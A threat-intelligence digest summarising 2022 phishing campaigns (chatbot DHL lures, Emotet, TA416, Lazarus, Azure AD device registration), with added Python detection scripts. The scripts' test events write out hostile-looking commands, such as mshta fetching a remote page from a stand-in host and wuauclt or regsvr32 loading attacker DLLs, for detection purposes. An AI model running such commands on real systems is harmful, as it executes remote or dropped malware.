Phishing with Chatbots

May 24, 2022

Industry: N/A | Level: Strategic | Source: BleepingComputer

In the latest effort to make phishing scams look authentic, attackers are incorporating chatbots into the theft of personal and payment data. As observed by Trustwave and reported by BleepingComputer, DHL shipping-themed phishing emails carry a link to a phishing URL. Once the victim opens the link, a web chat page loads and plays a scripted conversation that adds legitimacy by posting a photo of the supposed package and claiming that a damaged label prevented delivery. The setup is designed to persuade the victim to hand over personal and payment information under the pretext of re-processing the package: the victim supplies a name, address and phone number as shipping details, then card details to cover the shipping cost. The payment page even prompts for a one-time passcode, which both reinforces the impression of a real checkout and captures the code itself.

Rise in LinkedIn Phishing Lures

April 26, 2022

Industry: N/A | Level: Strategic | Source: CheckPoint

Social media has surpassed shipping, retail, and technology as the most impersonated category in phishing. Previous campaigns relied on delivery-tracking emails as lures, but according to CheckPoint’s research for the first quarter of 2022, LinkedIn alone accounted for over half (52%) of phishing emails. The shift was dramatic: in the previous quarter, LinkedIn themes made up only 8% of phishing attempts. Threat actors appear to be using the LinkedIn lures to harvest credentials for the platform itself. Shipping remains a prominent abuse category in second place, since lures timed to e-commerce sales and deliveries continue to pay off. CheckPoint’s list of the 10 most abused brands of Q1 2022, by share of phishing attempts, is: LinkedIn (52%), DHL (14%), Google (7%), Microsoft (6%), FedEx (6%), WhatsApp (4%), Amazon (2%), Maersk (1%), AliExpress (0.8%) and Apple (0.8%).

IRS Themed Phishing with Emotet

March 22, 2022

Industry: N/A | Level: Tactical | Source: Cofense

In the spirit of the U.S. 2022 tax season, Emotet has tailored its latest phishing campaign to the event. Cofense Intelligence has repeatedly seen Emotet use this theme in past years, masquerading as the Internal Revenue Service (IRS) to lure victims into opening an attached zip file that contains a malicious document. If the document is opened and its content runs, it drops the Emotet DLL onto the victim’s workstation.

  • Anvilogic Use Cases:
    • Compressed File Execution
    • Malicious Document Execution
    • Suspicious File written to Disk

Google TAG Provides Update on Russian Threat Groups

March 15, 2022

Industry: Government, Media, Military | Level: Strategic | Source: GoogleTAG

Google’s Threat Analysis Group (TAG) has provided an update on the threat actor groups APT28/FancyBear, Ghostwriter/UNC1151 and Mustang Panda/Temp.Hex and their attacks focused on Ukraine. APT28/FancyBear was observed running phishing campaigns to obtain user credentials for a Ukrainian media site. Ghostwriter/UNC1151 has also conducted phishing campaigns targeting Polish and Ukrainian government and military organizations. Analysis of the China-based group Mustang Panda/Temp.Hex identified the distribution of a malicious zip file that downloads a further malicious payload.

TA416

March 15, 2022

Industry: N/A | Level: Tactical | Source: Proofpoint

Proofpoint research provides an update on activity since November 2021 by the Chinese APT group TA416, which has been running targeted campaigns against European diplomatic entities. Activity has increased since Russia’s invasion of Ukraine. A new technique was identified in the group’s phishing campaigns. Initially the group uses web bugs to profile recipients and obtain a “sign of life,” indicating to the attackers that the victim is active and can be enticed into opening malicious emails. Subsequent phishing emails were observed leveraging the “email marketing service SMTP2Go, which allows users to alter the envelope sender field while using a unique sender address generated by the service.” Abuse of the SMTP2Go service has allowed the group to impersonate different European organizations. The malicious emails carry a Dropbox link to a zip file containing the PlugX malware executable. Upon execution, the malware establishes persistence through DLL search order hijacking, using the PE file potplayermini.exe associated with a public media player, and downloads additional payloads.

  • Anvilogic Use Cases:
    • Compressed File Execution
    • Executable File Written to Disk
    • Suspicious File written to Disk
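Two of the lure characteristics described in the TA416 entry can be checked mechanically: an envelope sender (Return-Path) whose domain does not match the header From domain, which is what altering the envelope sender at a relay service produces, and a remote “web bug” image that reports back when the mail is rendered. The script below is an added example and is not Proofpoint’s or Anvilogic’s code; the two messages it inspects are constructed, and every domain and URL in them is a placeholder.

```python
"""Added example: header and body checks for the TA416 lure characteristics
(envelope sender altered via a relay service, and a web bug). Not Proofpoint's
or Anvilogic's code; the messages are constructed and all domains/URLs are
placeholders."""
import re
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr

# Constructed sample: From claims a diplomatic domain, but the envelope sender
# (Return-Path) is a service-generated address at a different domain, and the
# HTML body carries a 1x1 remote image with a per-recipient token.
SUSPECT_EML = b"""\
Return-Path: <bounce-8841@relay.example.net>
From: "Embassy Protocol Office" <protocol@diplomacy.example.org>
To: analyst@victim.example.com
Subject: Updated conference agenda
Content-Type: text/html; charset="utf-8"

<html><body><p>Please review the updated agenda.</p>
<img src="http://track.example.net/px/9f3b2c7a.gif" width="1" height="1">
</body></html>
"""

# Constructed benign message: aligned sender domains, no remote images.
BENIGN_EML = b"""\
Return-Path: <alice@corp.example.com>
From: Alice <alice@corp.example.com>
To: analyst@victim.example.com
Subject: Lunch
Content-Type: text/plain; charset="utf-8"

12:30 at the usual place?
"""

IMG_TAG = re.compile(r"<img\b[^>]*>", re.I)
ATTR = re.compile(r"""(\w+)\s*=\s*["']?([^"'\s>]+)""", re.I)


def _domain(addr: str) -> str:
    """Domain part of an address, tolerating display names and angle brackets."""
    return parseaddr(addr)[1].rpartition("@")[2].lower()


def _px(value: str) -> int:
    """Leading integer of a width/height attribute; unknown -> treat as large."""
    m = re.match(r"\d+", value)
    return int(m.group()) if m else 9999


def find_web_bugs(html: str) -> list[str]:
    """Remote <img> elements that are 1x1 or hidden: classic tracking pixels."""
    bugs = []
    for tag in IMG_TAG.findall(html):
        attrs = {k.lower(): v for k, v in ATTR.findall(tag)}
        src = attrs.get("src", "")
        if not src.lower().startswith(("http://", "https://")):
            continue  # inline/cid images do not call home
        tiny = _px(attrs.get("width", "")) <= 1 and _px(attrs.get("height", "")) <= 1
        hidden = "display:none" in attrs.get("style", "").replace(" ", "").lower()
        if tiny or hidden:
            bugs.append(src)
    return bugs


def analyze_message(raw: bytes) -> dict:
    """Return the sender-alignment verdict and any web bugs for one message."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    envelope = _domain(str(msg.get("Return-Path", "")))
    header_from = _domain(str(msg.get("From", "")))
    body = msg.get_body(preferencelist=("html",))
    html = body.get_content() if body is not None else ""
    return {
        "envelope_domain": envelope,
        "from_domain": header_from,
        "sender_mismatch": bool(envelope and header_from and envelope != header_from),
        "web_bugs": find_web_bugs(html),
    }


if __name__ == "__main__":
    for label, raw in (("suspect", SUSPECT_EML), ("benign", BENIGN_EML)):
        print(label, analyze_message(raw))
```

A Return-Path/From mismatch on its own is common for legitimate bulk mail, so treat it as a scoring signal rather than a verdict. A relay that uses its own envelope domain will pass SPF for that domain, which is exactly why the service is attractive to the attacker; the useful check is whether the From domain aligns with the domain that actually authenticated (the DMARC alignment test), which is what the mismatch above approximates.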

Phishing with Citibank Lures

March 01, 2022

Industry: Financial | Level: Strategic | Source: BleepingComputer

A widespread phishing campaign is targeting Citibank customers, as reported by BleepingComputer and investigated by Bitdefender. The phishing email attempts to capture the victim’s Citibank online banking credentials and personal information, urging swift action to avoid account suspension via a link to a fraudulent Citibank login page. Victim statistics tracked by Bitdefender show targets are predominantly in the United States (81%), followed by the UK (7%) and South Korea (4%). A second Citibank-themed campaign, which ran between February 11th and 15th, 2022, enticed victims with a chance to win monetary prizes in order to capture personal information including “full name, address, age, phone number, and a scanned copy of their national ID card.”

Belarusian Hackers, UNC1151 Target Ukraine

March 01, 2022

Industry: Defense, Military | Level: Strategic | Source: TechCrunch

As reported by TechCrunch and announced in a social media post by Ukraine’s Computer Emergency Response Team (CERT-UA), a phishing campaign by the Belarusian state-sponsored group UNC1151 is targeting the private email accounts of Ukrainian military personnel. CERT-UA states, “Mass phishing emails have recently been observed targeting private i.ua and meta.ua accounts of Ukrainian military personnel and related individuals…After the account is compromised, the attackers, by the IMAP protocol, get access to all the messages. Later, the attackers use contact details from the victim’s address book to send the phishing emails.” UNC1151 activity has consistently been tied to targeting the Ukrainian military, so the attribution is in line with the group’s trend over the past two years. The Kyiv government has also attributed DDoS attacks against Ukrainian websites to the group.

Lazarus Uses Windows Update Client

February 01, 2022

Industry: Defense | Level: Operational | Source: Malwarebytes

The Malwarebytes Threat Intelligence team has identified a new wave of activity from the North Korean threat group Lazarus, observed as early as January 18th, 2022. As in past campaigns, the phishing theme is new job opportunities, here aimed at the defense industry with offers purporting to come from Lockheed Martin, BAE Systems, Boeing and Northrop Grumman. One of the two malicious documents uses multiple process injections for defense evasion and achieves persistence through the Startup folder; this campaign is also the first in which Lazarus has been seen using GitHub for command and control. The second document differs mainly in that, on macro execution, mshta is launched to execute a remote HTML page. The campaign also abuses the Windows Update client (wuauclt.exe) to run a malicious DLL, launched via an LNK file, so that the malicious code executes under a signed Microsoft binary and evades security detection.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Execution from Startup Folder
    • Symbolic OR Hard File Link Created
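The execution chains in the Emotet IRS entry (zip archive, malicious document, dropped DLL) and in the Lazarus entry above (LNK launching the Windows Update client with a DLL; a macro launching mshta against a remote page) all surface as process-creation events, and the use cases listed for both entries are essentially rules over those events. The script below is an added example of such rules and is not Anvilogic’s, Cofense’s or Malwarebytes’ detection content. The events it runs over are constructed Sysmon Event ID 1-style records with made-up paths, users and hosts; the archive temp-folder patterns and the wuauclt command-line shape are assumptions stated in the comments.

```python
"""Added example, not Anvilogic's, Cofense's or Malwarebytes' detection logic:
process-creation rules for the chains described in the Emotet IRS entry
(zip -> malicious document -> DLL) and the Lazarus entry (LNK -> Windows Update
client loading a DLL; macro -> mshta fetching a remote page). Events are
constructed Sysmon Event ID 1-style records; every path, user and host is made up.
"""
import re
from pathlib import PureWindowsPath

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "powershell.exe", "cmd.exe"}
# Temp folders created when a document is opened straight from an archive:
# Explorer's zip handling (Temp1_<name>.zip), WinRAR (Rar$...) and 7-Zip (7z...).
# Assumption: these three cover the extractors found on typical workstations.
ARCHIVE_TEMP = re.compile(r"\\Temp\\(Temp\d*_[^\\]+\.zip|Rar\$[^\\]+|7z[^\\]+)\\", re.I)
REMOTE_URL = re.compile(r"https?://\S+", re.I)
# Publicly documented LOLBin shape for running a DLL under the update client:
#   wuauclt.exe /UpdateDeploymentProvider <dll> /RunHandlerComServer
WUAUCLT_DLL = re.compile(r'/UpdateDeploymentProvider\s+"?([^"\s]+\.dll)"?', re.I)


def _base(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def rule_office_spawn(e: dict) -> bool:
    """Office application launched a scripting/loader binary (macro execution)."""
    return _base(e["parent_image"]) in OFFICE and _base(e["image"]) in LOLBINS


def rule_doc_from_archive(e: dict) -> bool:
    """Office opened a document directly out of an archive's temp folder."""
    return _base(e["image"]) in OFFICE and ARCHIVE_TEMP.search(e["command_line"]) is not None


def rule_wuauclt_sideload(e: dict) -> bool:
    """Windows Update client told to load a DLL from outside the Windows directory."""
    if _base(e["image"]) != "wuauclt.exe":
        return False
    cmd = e["command_line"]
    m = WUAUCLT_DLL.search(cmd)
    if m is None or "/runhandlercomserver" not in cmd.lower():
        return False
    return not m.group(1).lower().startswith("c:\\windows\\")


def rule_mshta_remote(e: dict) -> bool:
    """mshta.exe executing content fetched from a URL."""
    return _base(e["image"]) == "mshta.exe" and REMOTE_URL.search(e["command_line"]) is not None


RULES = {
    "office_spawn": rule_office_spawn,
    "doc_from_archive": rule_doc_from_archive,
    "wuauclt_sideload": rule_wuauclt_sideload,
    "mshta_remote": rule_mshta_remote,
}


def evaluate(events: list[dict]) -> list[tuple[str, int]]:
    """Return (rule_name, event_id) for every rule each event trips, in input order."""
    return [(name, e["id"]) for e in events for name, fn in RULES.items() if fn(e)]


WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
EVENTS = [  # constructed
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe", "image": WORD,
     "command_line": f'"{WORD}" /n "C:\\Users\\alice\\AppData\\Local\\Temp\\Temp1_IRS_Notice.zip\\W-9_Form.doc"'},
    {"id": 2, "parent_image": WORD, "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r"regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\xuvr.dll"},
    {"id": 3, "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\wuauclt.exe",
     "command_line": r"wuauclt.exe /UpdateDeploymentProvider C:\Users\alice\AppData\Roaming\wuaueng.dll /RunHandlerComServer"},
    {"id": 4, "parent_image": WORD, "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe https://cdn.example.net/careers/offer.html"},
    # benign: a normal document open and a routine update-client invocation
    {"id": 5, "parent_image": r"C:\Windows\explorer.exe", "image": WORD,
     "command_line": f'"{WORD}" /n "C:\\Users\\alice\\Documents\\report.docx"'},
    {"id": 6, "parent_image": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\wuauclt.exe",
     "command_line": r"wuauclt.exe /detectnow"},
]

if __name__ == "__main__":
    for rule, event_id in evaluate(EVENTS):
        print(f"event {event_id}: {rule}")
```

Events 1 through 4 each trip at least one rule (event 4 trips two, since mshta was both spawned by Word and handed a URL); the two benign events trip none. In production the wuauclt rule should key on the DLL path rather than on wuauclt.exe alone, because the update client itself runs constantly on every host.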

New Device Registration Tactic

February 01, 2022

Industry: N/A | Level: Tactical | Source: Microsoft

Research from Microsoft identified attackers taking advantage of user accounts that had no device registered for MFA. The attackers used those accounts to register their own devices in the target organization’s Azure Active Directory. The threat unfolds in two waves. The first is a phishing campaign that steals credentials and adds an Outlook inbox rule; the rule follows a consistent pattern, with the same rule entry found in over one hundred identified mailboxes. The second wave uses the stolen credentials to gain access and expand the attacker’s foothold in the target environment. Targeted organizations were located mostly in Australia, Singapore, Indonesia, and Thailand.

  • Anvilogic Use Cases:
    • O365 Inbox Rules
    • Add user to Azure AD Group or Role
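The two waves described above leave a sequence in the tenant’s audit trail: a sign-in from an IP the user has never used, an inbox rule created shortly afterwards, and then a device registration from the same unfamiliar IP. The script below is an added example of correlating that sequence and is not Microsoft’s or Anvilogic’s detection content. Its events, users and IP addresses are constructed; the operation names (“UserLoggedIn” and “New-InboxRule” as in the Microsoft 365 unified audit log, “Add registered device” as in the Azure AD audit log) and the parameter names are assumptions about how the records are normalized, and the specific rule parameters are made up since the page does not say what the attackers’ rule did.

```python
"""Added example (not Microsoft's or Anvilogic's detection content): correlate a
suspicious inbox rule with a subsequent device registration from an IP the user
has never used. Events, users and IPs are constructed; the operation and
parameter names are assumptions about how audit records are normalized.
"""
from datetime import datetime, timedelta

# Folders attackers commonly pick to hide diverted mail from the mailbox owner.
SUSPICIOUS_FOLDERS = {"rss subscriptions", "rss feeds", "conversation history", "junk email"}


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def inbox_rule_reasons(params: dict) -> list[str]:
    """Why an inbox rule looks like a credential-theft follow-up, if it does."""
    reasons = []
    if params.get("DeleteMessage"):
        reasons.append("deletes matching mail")
    if str(params.get("MoveToFolder", "")).lower() in SUSPICIOUS_FOLDERS:
        reasons.append(f"moves matching mail to '{params['MoveToFolder']}'")
    target = params.get("ForwardTo") or params.get("RedirectTo")
    if target:
        reasons.append(f"forwards mail to {target}")
    if params.get("MarkAsRead") and params.get("SubjectContainsWords"):
        reasons.append("marks keyword matches as read")
    return reasons


def correlate(events: list[dict], baseline_ips: dict, window_hours: int = 72) -> list[dict]:
    """Emit alerts per user; 'high' when a device registration from an unseen IP
    follows a suspicious inbox rule within the window."""
    alerts = []
    by_user: dict[str, list[dict]] = {}
    for e in sorted(events, key=lambda e: e["time"]):
        by_user.setdefault(e["user"], []).append(e)
    window = timedelta(hours=window_hours)
    for user, evs in by_user.items():
        known = set(baseline_ips.get(user, ()))  # IPs seen in the user's sign-in history
        rule_times = []
        for e in evs:
            op, t = e["operation"], _ts(e["time"])
            if op in ("New-InboxRule", "Set-InboxRule"):
                reasons = inbox_rule_reasons(e.get("params", {}))
                if reasons:
                    rule_times.append(t)
                    alerts.append({"user": user, "severity": "medium",
                                   "reason": "suspicious inbox rule: " + "; ".join(reasons)})
            elif op == "Add registered device" and e["ip"] not in known:
                name = e.get("params", {}).get("DeviceDisplayName", "?")
                if any(timedelta(0) <= t - rt <= window for rt in rule_times):
                    alerts.append({"user": user, "severity": "high",
                                   "reason": f"device '{name}' registered from unseen IP {e['ip']} "
                                             f"within {window_hours}h of a suspicious inbox rule"})
                else:
                    alerts.append({"user": user, "severity": "medium",
                                   "reason": f"device '{name}' registered from unseen IP {e['ip']}"})
    return alerts


# Constructed baseline and events; times are UTC, addresses are RFC 5737 test ranges.
BASELINE_IPS = {"alice@victim.example.com": {"203.0.113.10"}, "bob@victim.example.com": {"203.0.113.10"}}
EVENTS = [
    {"time": "2022-01-10T08:02:11Z", "user": "alice@victim.example.com", "operation": "UserLoggedIn", "ip": "203.0.113.10"},
    {"time": "2022-01-12T02:14:40Z", "user": "alice@victim.example.com", "operation": "UserLoggedIn", "ip": "198.51.100.77"},
    {"time": "2022-01-12T02:16:05Z", "user": "alice@victim.example.com", "operation": "New-InboxRule", "ip": "198.51.100.77",
     "params": {"SubjectContainsWords": "invoice;payment;password", "MoveToFolder": "RSS Subscriptions", "MarkAsRead": True}},
    {"time": "2022-01-12T03:05:50Z", "user": "alice@victim.example.com", "operation": "Add registered device", "ip": "198.51.100.77",
     "params": {"DeviceDisplayName": "DESKTOP-7Q2K1"}},
    # bob: an ordinary housekeeping rule from a known IP, no device activity
    {"time": "2022-01-11T09:30:00Z", "user": "bob@victim.example.com", "operation": "New-InboxRule", "ip": "203.0.113.10",
     "params": {"FromAddressContainsWords": "newsletter", "MoveToFolder": "Archive"}},
]

if __name__ == "__main__":
    for a in correlate(EVENTS, BASELINE_IPS):
        print(a["severity"].upper(), a["user"], a["reason"])
```

The baseline of known IPs should be built from a few weeks of sign-in history; a device registration from a new address on its own is routine for travelling users, which is why it only reaches “high” when it follows a suspicious rule. The same correlation applies to a subsequent group or role assignment for the account, which is the other use case listed above.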

Tardigrade Targeting Bio-Manufacturing Facilities and Research Centers

November 24, 2021

Industry: Bio-manufacturing | Level: Strategic | Sources: BIO-ISAC & BleepingComputer

The Bioeconomy Information Sharing and Analysis Center (BIO-ISAC) issued an advisory on the hacking group Tardigrade, which has been targeting bio-manufacturing facilities and research centers developing vaccines and critical medicines. In a compromise of a large biomanufacturing facility in spring 2021, the investigation found that “a malware loader was identified that demonstrated a high degree of autonomy as well as metamorphic capabilities.” The same malware was identified at a second facility in October 2021. Identified as a version of SmokeLoader, the malware is delivered through phishing or USB sticks, and this variant is stealthy in that it can operate without a C2 connection. Attacks attributed to Tardigrade over the year affected entities including Düsseldorf University, Americold, Miltenyi Biotec, the European Medicines Agency (EMA), and Ireland’s HSE. Given the variety of ransomware and payloads identified, it is likely the group partnered with different operations to provide initial network access.